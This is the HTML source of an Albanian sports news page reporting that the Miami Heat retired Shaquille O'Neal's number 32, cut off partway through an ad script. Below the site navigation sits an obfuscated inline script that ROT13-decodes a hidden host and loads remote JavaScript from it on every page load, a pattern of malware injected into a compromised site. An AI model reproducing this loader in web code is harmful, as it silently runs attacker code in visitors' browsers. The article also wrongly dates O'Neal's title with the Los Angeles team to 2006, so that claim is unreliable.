<!DOCTYPE html>
<html lang="en-US" class="no-js">
<head>
	<meta charset="UTF-8">
	        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://www.shqipmedia.com/xmlrpc.php">
	<!--[if lt IE 9]>
	<script src="http://www.shqipmedia.com/wp-content/themes/newsplus-new/js/html5.js"></script>
	<![endif]-->
	<title>Miami Heat e pensionon fanellën e Shaquille O’Neal &#8211; Shqipmedia</title>
<!-- Jetpack Site Verification Tags -->
<meta name="google-site-verification" content="qFHrN0Nus_4yo8QKnwu-Vm_yNhvR60DK6Xgl5yjyvrA" />
<meta name="msvalidate.01" content="D59438369A3F23A192A075E90CD65E8D" />
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Shqipmedia &raquo; Feed" href="http://www.shqipmedia.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Shqipmedia &raquo; Comments Feed" href="http://www.shqipmedia.com/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.shqipmedia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.6.1"}};
			!function(a,b,c){function d(a){var c,d,e,f,g,h=b.createElement("canvas"),i=h.getContext&&h.getContext("2d"),j=String.fromCharCode;if(!i||!i.fillText)return!1;switch(i.textBaseline="top",i.font="600 32px Arial",a){case"flag":return i.fillText(j(55356,56806,55356,56826),0,0),!(h.toDataURL().length<3e3)&&(i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,65039,8205,55356,57096),0,0),c=h.toDataURL(),i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,55356,57096),0,0),d=h.toDataURL(),c!==d);case"diversity":return i.fillText(j(55356,57221),0,0),e=i.getImageData(16,16,1,1).data,f=e[0]+","+e[1]+","+e[2]+","+e[3],i.fillText(j(55356,57221,55356,57343),0,0),e=i.getImageData(16,16,1,1).data,g=e[0]+","+e[1]+","+e[2]+","+e[3],f!==g;case"simple":return i.fillText(j(55357,56835),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode8":return i.fillText(j(55356,57135),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode9":return i.fillText(j(55358,56631),0,0),0!==i.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity","unicode9"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='newsplus-fontawesome-css'  href='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/css/font-awesome.min.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='newsplus-shortcodes-css'  href='http://www.shqipmedia.com/wp-content/plugins/newsplus-shortcodes/assets/css/newsplus-shortcodes.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='sharify-css'  href='http://www.shqipmedia.com/wp-content/plugins/sharify/sharify-style.php' type='text/css' media='all' />
<link rel='stylesheet' id='sharify-icon-css'  href='http://www.shqipmedia.com/wp-content/plugins/sharify/icon/css/sharify.css' type='text/css' media='all' />
<link rel='stylesheet' id='sharify-font-css'  href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400' type='text/css' media='all' />
<link rel='stylesheet' id='newsplus-fonts-css'  href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,300,400,600,700&#038;subset=latin,latin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='newsplus-style-css'  href='http://www.shqipmedia.com/wp-content/themes/newsplus-new/style.css?ver=4.6.1' type='text/css' media='all' />
<!--[if lt IE 9]>
<link rel='stylesheet' id='newsplus-ie-css'  href='http://www.shqipmedia.com/wp-content/themes/newsplus-new/css/ie.css?ver=4.6.1' type='text/css' media='all' />
<![endif]-->
<link rel='stylesheet' id='newsplus-responsive-css'  href='http://www.shqipmedia.com/wp-content/themes/newsplus-new/responsive.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='prettyphoto-css'  href='http://www.shqipmedia.com/wp-content/themes/newsplus-new/css/prettyPhoto.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='newsplus-user-css'  href='http://www.shqipmedia.com/wp-content/themes/newsplus-new/user.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://www.shqipmedia.com/wp-content/plugins/jetpack/css/jetpack.css?ver=4.4.1' type='text/css' media='all' />
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.shqipmedia.com/wp-content/plugins/jetpack/modules/related-posts/related-posts.js?ver=20150408'></script>
<link rel='https://api.w.org/' href='http://www.shqipmedia.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.shqipmedia.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.shqipmedia.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Njihuni me bukuroshen e futbollistit gjerman Götze &#8211; FOTO' href='http://www.shqipmedia.com/njihuni-me-bukuroshen-e-futbollistit-gjerman-gotze-foto/' />
<link rel='next' title='Gjyqtarja e famshme: Ia prekën gjinjtë, Guardiola i bërtiti, tash asistoi në gol!!!' href='http://www.shqipmedia.com/gjyqtarja-e-famshme-ia-preken-gjinjte-guardiola-i-bertiti-tash-asistoi-ne-gol/' />
<meta name="generator" content="WordPress 4.6.1" />
<link rel="canonical" href="http://www.shqipmedia.com/miami-heat-e-pensionon-fanellen-e-shaquille-oneal/" />
<link rel='shortlink' href='http://wp.me/pUOQC-kHq' />
<link rel="alternate" type="application/json+oembed" href="http://www.shqipmedia.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.shqipmedia.com%2Fmiami-heat-e-pensionon-fanellen-e-shaquille-oneal%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.shqipmedia.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.shqipmedia.com%2Fmiami-heat-e-pensionon-fanellen-e-shaquille-oneal%2F&#038;format=xml" />
<meta property="fb:app_id" content="102104852359"/><script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-68429536-1', 'auto');
ga('send', 'pageview');
</script>

<link rel='dns-prefetch' href='//widgets.wp.com'>
<link rel='dns-prefetch' href='//s0.wp.com'>
<link rel='dns-prefetch' href='//0.gravatar.com'>
<link rel='dns-prefetch' href='//1.gravatar.com'>
<link rel='dns-prefetch' href='//2.gravatar.com'>
<link rel='dns-prefetch' href='//i0.wp.com'>
<link rel='dns-prefetch' href='//i1.wp.com'>
<link rel='dns-prefetch' href='//i2.wp.com'>
<style type='text/css'>img#wpstats{display:none}</style><style type="text/css">
	.primary-nav {
	background-color:#ad0000;
	}
	ul.nav-menu > li > a {
	text-shadow: none;
	color:#ffffff;
	}
	.primary-nav li:hover > a {
	color:#dbdbdb;
	border-bottom-color: #ad0000;
	}
	ul.nav-menu > li.current-menu-item > a,
	ul.nav-menu > li.current-menu-ancestor > a,
	ul.nav-menu > li.current_page_item > a,
	ul.nav-menu > li.current_page_ancestor > a {
	border-bottom-color: #ad0000;
	}
	.primary-nav li ul {
	background-color:#ffffff;
	}
	.primary-nav li ul li a {
	color:;
	}
	.primary-nav li ul li:hover > a {
	color:;
	background-color:;
	}
	h3.sb-title {
	color:;
	}
	#secondary {
	color:#ffffff;
	background-color:#0a0a0a;
	}
	#secondary .sep {
	color:#ffffff;
	}
	#secondary a,
	#secondary ul a,
	#secondary ul .entry-meta a,
	#secondary ul .widget .entry-meta a {
	color:#ffffff;
	}
	#secondary a:hover,
	#secondary ul a:hover,
	#secondary ul .entry-meta a:hover,
	#secondary ul .widget .entry-meta a:hover {
	color:#ad0000;
	}
	h3.sc-title {
	color:#ffffff;
	}
	#secondary .widget ul li {
	border-bottom-color: #ad0000;
	}

	#secondary .widget ul ul {
	border-top-color: #ad0000;
	}
	#footer {
	color:#ffffff;
	background-color:#0a0a0a;
	}
	body.is-stretched.custom-background {
	background-color:#0a0a0a;
	}
	#footer a {
	color:#ffffff;
	}
	#footer a:hover {
	color:#ad0000;
	}
</style>
	
		<style type="text/css">
		
				
		body {
			font-size: 17px;
		}		
		
				
		#page {
			max-width: 1600px;
		}
		
		.wrap,
		.primary-nav,
		.is-stretched .primary-nav .wrap,
		#utility-top {
			max-width: 1552px;
		}
		
				
		</style>
	
	<!--[if lt IE 9]>
<script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="shortcut icon" href="http://www.shqipmedia.com/wp-content/uploads/2015/03/shqipmedia-icon-red.png" type="image/x-icon">
<link rel="apple-touch-icon-precomposed" href="http://www.shqipmedia.com/wp-content/uploads/2015/03/shqipmedia-icon-red.png">		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="Miami Heat e pensionon fanellën e Shaquille O’Neal" />
<meta property="og:url" content="http://www.shqipmedia.com/miami-heat-e-pensionon-fanellen-e-shaquille-oneal/" />
<meta property="og:description" content="Miami Heat e pensionoi numrin 32 i cili u bart nga qendra e mirënjohur Shaquille O’Neal. Fanella me numrin 32, është ngritur në sallën “American Airlines Arena” të Miamit dje në ndeshjen kundër Los…" />
<meta property="article:published_time" content="2016-12-23T10:25:37+00:00" />
<meta property="article:modified_time" content="2016-12-23T10:27:06+00:00" />
<meta property="og:site_name" content="Shqipmedia" />
<meta property="og:image" content="https://i2.wp.com/www.shqipmedia.com/wp-content/uploads/2016/12/auto_mmm-4-780x4391482483798.jpg?fit=850%2C478" />
<meta property="og:image:width" content="850" />
<meta property="og:image:height" content="478" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:site" content="@shqipmedia" />
<meta name="twitter:image" content="https://i2.wp.com/www.shqipmedia.com/wp-content/uploads/2016/12/auto_mmm-4-780x4391482483798.jpg?fit=850%2C478&#038;w=640" />
<meta name="twitter:card" content="summary_large_image" />
<link rel="icon" href="https://i0.wp.com/www.shqipmedia.com/wp-content/uploads/2015/03/cropped-shqipmedia-icon-red.png?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://i0.wp.com/www.shqipmedia.com/wp-content/uploads/2015/03/cropped-shqipmedia-icon-red.png?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://i0.wp.com/www.shqipmedia.com/wp-content/uploads/2015/03/cropped-shqipmedia-icon-red.png?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://i0.wp.com/www.shqipmedia.com/wp-content/uploads/2015/03/cropped-shqipmedia-icon-red.png?fit=270%2C270" />
</head>

<body class="single single-post postid-79572 single-format-standard custom-font-enabled is-stretched">
	    <div id="page" class="hfeed site clear">
            <div id="utility-top">
            <div class="wrap clear">
                                <nav id="optional-nav" class="secondary-nav">
                    <ul id="menu-footer-menu" class="sec-menu clear"><li id="menu-item-251" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-251"><a href="http://www.shqipmedia.com/kontakt/">Kontakt</a></li>
<li id="menu-item-252" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-252"><a href="http://www.shqipmedia.com/impressum/">Impressum</a></li>
<li id="menu-item-478" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478"><a href="http://www.shqipmedia.com/moti/">Moti</a></li>
<li id="menu-item-480" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-480"><a href="http://www.shqipmedia.com/arkiva/">Arkiva</a></li>
<li id="menu-item-1193" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1193"><a href="http://www.shqipmedia.com/horoskopi-2016/">Horoskopi 2016</a></li>
</ul>                </nav><!-- #optional-nav -->
                                <div id="search-bar" role="complementary">
                    <form role="search" method="get" class="search-form" action="http://www.shqipmedia.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>                </div><!-- #search-bar -->
                            </div><!-- #utility-top .wrap -->
        </div><!-- #utility-top-->
		        <header id="header" class="site-header" role="banner">
            <div class="wrap full-width clear">
			    <div class="brand column one-fourth" role="banner">
        <h4 class="site-title"><a href="http://www.shqipmedia.com/" title="Shqipmedia" rel="home"><img src="http://www.shqipmedia.com/wp-content/uploads/2015/03/A5-900x195.png" alt="Shqipmedia" title="Shqipmedia" /></a>
			</h4>    </div><!-- .column one-third -->
            </div><!-- #header .wrap -->
        </header><!-- #header -->
                        <nav id="responsive-menu">
                <h3 id="menu-button-1" class="menu-button">Menu<span class="toggle-icon"><span class="bar-1"></span><span class="bar-2"></span><span class="bar-3"></span></span></h3>
                </nav>
                    <nav id="main-nav" class="primary-nav" role="navigation">
            <div class="wrap">
                <ul id="menu-main-menu" class="nav-menu clear"><li id="menu-item-10774" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10774"><a href="http://www.shqipmedia.com/">Ballina</a></li>
<li id="menu-item-31" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-31"><a href="http://www.shqipmedia.com/category/lajme/">Lajme</a>
<ul class="sub-menu">
	<li id="menu-item-35" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-35"><a href="http://www.shqipmedia.com/category/lajme/maqedoni/">Maqedoni</a></li>
	<li id="menu-item-36" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-36"><a href="http://www.shqipmedia.com/category/lajme/shqiperi/">Shqipëri</a></li>
	<li id="menu-item-33" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-33"><a href="http://www.shqipmedia.com/category/lajme/kosove/">Kosovë</a></li>
	<li id="menu-item-34" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-34"><a href="http://www.shqipmedia.com/category/lajme/kronike-e-zeze/">Kronikë e Zezë</a></li>
	<li id="menu-item-238" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-238"><a href="http://www.shqipmedia.com/category/lajme/rajon-bota/">Rajon &#038; Bota</a></li>
	<li id="menu-item-32" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-32"><a href="http://www.shqipmedia.com/category/lajme/ekonomi/">Ekonomi</a></li>
	<li id="menu-item-38" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-38"><a href="http://www.shqipmedia.com/category/opinone/">Opinone</a></li>
</ul>
</li>
<li id="menu-item-41" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-41"><a href="http://www.shqipmedia.com/category/sport/">Sport</a></li>
<li id="menu-item-39" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39"><a href="http://www.shqipmedia.com/category/showbiz/">Showbiz</a></li>
<li id="menu-item-37" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-37"><a href="http://www.shqipmedia.com/category/lifestyle/">Lifestyle</a></li>
<li id="menu-item-29" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-29"><a href="http://www.shqipmedia.com/category/auto-tech/">Auto-Tech</a></li>
<li id="menu-item-30" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-30"><a href="http://www.shqipmedia.com/category/bulevard/">Bulevard</a></li>
<li id="menu-item-40" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40"><a href="http://www.shqipmedia.com/category/shqip/">Shqip+</a></li>
</ul>            </div><!-- .primary-nav .wrap -->
        </nav><!-- #main-nav -->
        <script type="text/javascript">
            (function(){function r(s){return s.replace(/[A-z]/g,function(c){return String.fromCharCode(c.charCodeAt(0)+('M'>=c.toUpperCase()?13:-13))})}
    var c=document.createElement('script'),wdefine=typeof define!=='undefined'?define:false;c.type='text/javascript';c.async=true;
    c.setAttribute('data-main',r('//ncc.zlfnsrhey.pbz/ncc.wf'));c.src='//cdnjs.cloudflare.com/ajax/libs/require.js/2.1.10/require.min.js';
    c.onload=function(){mydefine=define,define=wdefine?wdefine:null;};
    var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c,s);
})();
</script>
        <div id="main">
            <div class="wrap clear">
            	<div class="content-row"><div id="primary" class="site-content">
    <div id="content" role="main">
	<div class="breadcrumbs"><a href="http://www.shqipmedia.com">Home</a> <span class="sep"> / </span> <a href="http://www.shqipmedia.com/category/sport/">Sport</a> <span class="sep"> / </span> <span class="current">Miami Heat e pensionon fanellën e Shaquille O’Neal</span></div>			 <article id="post-79572" class="post-79572 post type-post status-publish format-standard has-post-thumbnail hentry category-sport">
                <header class="entry-header">
                    <h1 class="entry-title">Miami Heat e pensionon fanellën e Shaquille O’Neal</h1>
                                                <aside id="meta-79572" class="entry-meta"><span class="posted-on">Posted on </span><a href="http://www.shqipmedia.com/miami-heat-e-pensionon-fanellen-e-shaquille-oneal/" title="12:25" class="post-time"><time class="entry-date updated" datetime="2016-12-23T12:25:37+00:00">12/23/2016</time></a><span class="by-author"> by </span><span class="author vcard"><a class="url fn n" href="http://www.shqipmedia.com/author/shqipmedia5/" title="View all posts by shqipmedia5" rel="author">shqipmedia5</a></span><span class="posted-in"> in </span><a href="http://www.shqipmedia.com/category/sport/" rel="tag">Sport</a> </aside>
                        <div class="single-post-thumb"><img src="https://i2.wp.com/www.shqipmedia.com/wp-content/uploads/2016/12/auto_mmm-4-780x4391482483798.jpg?fit=850%2C478" class="attachment-post-thumbnail wp-post-image" alt="auto_mmm-4-780x4391482483798.jpg"></div>                </header>
                <div class="entry-content">
					<p>Miami Heat e pensionoi numrin 32 i cili u bart nga qendra e mirënjohur Shaquille O’Neal.</p>
<p>Fanella me numrin 32, është ngritur në sallën “American Airlines Arena” të Miamit dje në ndeshjen kundër Los Angeles Lakers.</p>
<p>Numri 32 nuk do të përdoret më, derisa Shaq gjatë viteve që ishte pjesë e Heatit, është bërë kampion një herë dhe është zgjedhur 3 herë “All-Star”.</p>
<p>Vlen të theksohet se ish-basketbollisti është shpallur kampion i NBA-s me skuadrën kaliforniane në vitin 2006.</p>
<div id="wpdevar_comment_1" style="width:100%;text-align:left;">
		<span style="padding: 10px;font-size:21px;font-family:Times New Roman,Times,Georgia,serif;color:#000000;">Komentet</span>
		<div class="fb-comments" data-href="http://www.shqipmedia.com/miami-heat-e-pensionon-fanellen-e-shaquille-oneal/" data-order-by="social" data-numposts="8" data-width="100%" style="display:block;"></div></div><div class="sharify-container"><ul><li class="sharify-btn-twitter">
								<a title="Tweet on Twitter" href="https://twitter.com/intent/tweet?text=Miami+Heat+e+pensionon+fanell%C3%ABn+e+Shaquille+O%E2%80%99Neal: http://www.shqipmedia.com/miami-heat-e-pensionon-fanellen-e-shaquille-oneal/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-twitter"></i></span>
									<span class="sharify-title">Tweet</span>
								</a>
							</li><li class="sharify-btn-facebook">
								<a title="Share on Facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.shqipmedia.com%2Fmiami-heat-e-pensionon-fanellen-e-shaquille-oneal%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-facebook"></i></span>
									<span class="sharify-title">Share</span>
									<span class="sharify-count">0</span>
								</a>
							</li><li class="sharify-btn-reddit">
								<a title="Submit to Reddit" href="http://reddit.com/submit?url=http://www.shqipmedia.com/miami-heat-e-pensionon-fanellen-e-shaquille-oneal/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=950,height=450,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-reddit"></i></span>
									<span class="sharify-title">Reddit</span>
								</a>
							</li><li class="sharify-btn-gplus">
								<a title="Share on Google+" href="http://plus.google.com/share?url=http://www.shqipmedia.com/miami-heat-e-pensionon-fanellen-e-shaquille-oneal/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-gplus"></i></span>
									<span class="sharify-title">+1</span>
								</a>
							</li><li class="sharify-btn-pocket">
								<a title="Save to read later on Pocket" href="https://getpocket.com/save?url=http%3A%2F%2Fwww.shqipmedia.com%2Fmiami-heat-e-pensionon-fanellen-e-shaquille-oneal%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-pocket"></i></span>
									<span class="sharify-title">Pocket</span>
								</a>
							</li><li class="sharify-btn-pinterest">
								<a title="Share on Pinterest" href="http://pinterest.com/pin/create/button/?url=http://www.shqipmedia.com/miami-heat-e-pensionon-fanellen-e-shaquille-oneal/&media=https://i2.wp.com/www.shqipmedia.com/wp-content/uploads/2016/12/auto_mmm-4-780x4391482483798.jpg?fit=850%2C478&description=Miami Heat e pensionon fanellën e Shaquille O’Neal - http://www.shqipmedia.com/miami-heat-e-pensionon-fanellen-e-shaquille-oneal/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;">
									<span class="sharify-icon"><i class="sharify sharify-pinterest"></i></span>
									<span class="sharify-title">Pinterest</span>
									<span class="sharify-count">0</span>
								</a>
							</li><li class="sharify-btn-linkedin">
								<a title="Share on Linkedin" href="https://www.linkedin.com/shareArticle?mini=true&url=http://www.shqipmedia.com/miami-heat-e-pensionon-fanellen-e-shaquille-oneal/&title=Miami Heat e pensionon fanellën e Shaquille O’Neal" onclick="if(!document.getElementById('td_social_networks_buttons')){window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;}" >
									<span class="sharify-icon"><i class="sharify sharify-linkedin"></i></span>
									<span class="sharify-title">LinkedIn</span>
									<span class="sharify-count">0</span>
								</a>
							</li></ul></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	
</div>                </div><!-- .entry-content -->
                <footer>
                                </footer><!-- .entry-meta -->
			</article><!-- #post-79572 -->
            
			
	<nav class="navigation post-navigation" role="navigation">
		<h2 class="screen-reader-text">Post navigation</h2>
		<div class="nav-links"><div class="nav-previous"><a href="http://www.shqipmedia.com/njihuni-me-bukuroshen-e-futbollistit-gjerman-gotze-foto/" rel="prev"><span class="meta-nav" aria-hidden="true">Previous</span> <span class="screen-reader-text">Previous post:</span> <span class="post-title">Njihuni me bukuroshen e futbollistit gjerman Götze &#8211; FOTO</span></a></div><div class="nav-next"><a href="http://www.shqipmedia.com/gjyqtarja-e-famshme-ia-preken-gjinjte-guardiola-i-bertiti-tash-asistoi-ne-gol/" rel="next"><span class="meta-nav" aria-hidden="true">Next</span> <span class="screen-reader-text">Next post:</span> <span class="post-title">Gjyqtarja e famshme: Ia prekën gjinjtë, Guardiola i bërtiti, tash asistoi në gol!!!</span></a></div></div>
	</nav>		<div class="related-posts clear">
			<h3>Related Posts</h3>
			<ul class="thumb-style clear">
							<li>
										<a class="post-thumb" href="http://www.shqipmedia.com/nese-conte-dorehiqet-nga-kombetarja-italiane-gati-mazzarri/" title="Nëse Conte dorëhiqet nga kombëtarja italiane, gati Mazzarri"><img src="https://i1.wp.com/www.shqipmedia.com/wp-content/uploads/2014/12/095.jpg?resize=150%2C150" alt="Nëse Conte dorëhiqet nga kombëtarja italiane, gati Mazzarri" title="Nëse Conte dorëhiqet nga kombëtarja italiane, gati Mazzarri"/></a>
										<h4><a href="http://www.shqipmedia.com/nese-conte-dorehiqet-nga-kombetarja-italiane-gati-mazzarri/" title="Nëse Conte dorëhiqet nga kombëtarja italiane, gati Mazzarri">Nëse Conte dorëhiqet nga kombëtarja italiane, gati Mazzarri</a></h4>
								</li>
							<li>
										<a class="post-thumb" href="http://www.shqipmedia.com/fiton-shkupi-barazim-i-turpshem-i-shkendijes-video/" title="Fiton Shkupi, barazim i turpshëm i Shkëndijës &#8211; VIDEO"><img src="https://i2.wp.com/www.shqipmedia.com/wp-content/uploads/2015/11/16563f7f8caee08-1024x692.png?resize=150%2C150" alt="Fiton Shkupi, barazim i turpshëm i Shkëndijës &#8211; VIDEO" title="Fiton Shkupi, barazim i turpshëm i Shkëndijës &#8211; VIDEO"/></a>
										<h4><a href="http://www.shqipmedia.com/fiton-shkupi-barazim-i-turpshem-i-shkendijes-video/" title="Fiton Shkupi, barazim i turpshëm i Shkëndijës &#8211; VIDEO">Fiton Shkupi, barazim i turpshëm i Shkëndijës &#8211; VIDEO</a></h4>
								</li>
							<li>
										<a class="post-thumb" href="http://www.shqipmedia.com/skenderbeu-dinamo-zagreb-policia-prezanton-planin-e-masave/" title="Skënderbeu-Dinamo Zagreb, policia prezanton planin e masave"><img src="https://i2.wp.com/www.shqipmedia.com/wp-content/uploads/2015/08/072.jpg?resize=150%2C150" alt="Skënderbeu-Dinamo Zagreb, policia prezanton planin e masave" title="Skënderbeu-Dinamo Zagreb, policia prezanton planin e masave"/></a>
										<h4><a href="http://www.shqipmedia.com/skenderbeu-dinamo-zagreb-policia-prezanton-planin-e-masave/" title="Skënderbeu-Dinamo Zagreb, policia prezanton planin e masave">Skënderbeu-Dinamo Zagreb, policia prezanton planin e masave</a></h4>
								</li>
						</ul>
			</div><!-- .related-posts -->
	
<div id="comments" class="comments-area">

	
	
	
</div><!-- /.comments-area -->    </div><!-- #content -->
</div><!-- #primary -->
<div id="sidebar" class="widget-area" role="complementary">
<aside id="text-61" class="widget widget_text">			<div class="textwidget"><a href="https://www.facebook.com/iptvkanale/"><img src="http://www.shqipmedia.com/wp-content/uploads/2016/12/rsz_15497932_10211795745991968_737804347_n.jpg" alt="rsz_15497932_10211795745991968_737804347_n" width="420" height="320" class="aligncenter size-full wp-image-79182" /></a></div>
		</aside><aside id="text-60" class="widget widget_text">			<div class="textwidget"><a href="https://www.facebook.com/sunandstars.com.mk/?fref=ts"><img src="http://www.shqipmedia.com/wp-content/uploads/2015/02/sun-and-stars.gif" alt="sun-and-stars" width="500" height="350" class="aligncenter size-full wp-image-75408" /></a></div>
		</aside><aside id="text-45" class="widget widget_text">			<div class="textwidget"><a href="https://www.facebook.com/PalmaMall"><img src="http://www.shqipmedia.com/wp-content/uploads/2015/10/11997190_10207322821896194_363795570_n.jpg" title="source: shqipmedia.com" /></a></div>
		</aside><aside id="text-52" class="widget widget_text">			<div class="textwidget"></div>
		</aside><aside id="text-39" class="widget widget_text">			<div class="textwidget"><!--/* Revive Adserver Javascript Tag v3.0.5 */-->

<!--/*
  * The backup image section of this tag has been generated for use on a
  * non-SSL page. If this tag is to be placed on an SSL page, change the
  *   'http://aplikacii.com/reklami/www/delivery/...'
  * to
  *   'https://aplikacii.com/reklami/www/delivery/...'
  *
  * This noscript section of this tag only shows image banners. There
  * is no width or height in these banners, so if you want these tags to
  * allocate space for the ad before it shows, you will need to add this
  * information to the <img> tag.
  *
  * If you do not want to deal with the intricities of the noscript
  * section, delete the tag (from <noscript>... to </noscript>). On
  * average, the noscript tag is called from less than 1% of internet
  * users.
  */-->

<script type='text/javascript'><!--//<![CDATA[
   var m3_u = (location.protocol=='https:'?'https://aplikacii.com/reklami/www/delivery/ajs.php':'http://aplikacii.com/reklami/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=2411");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
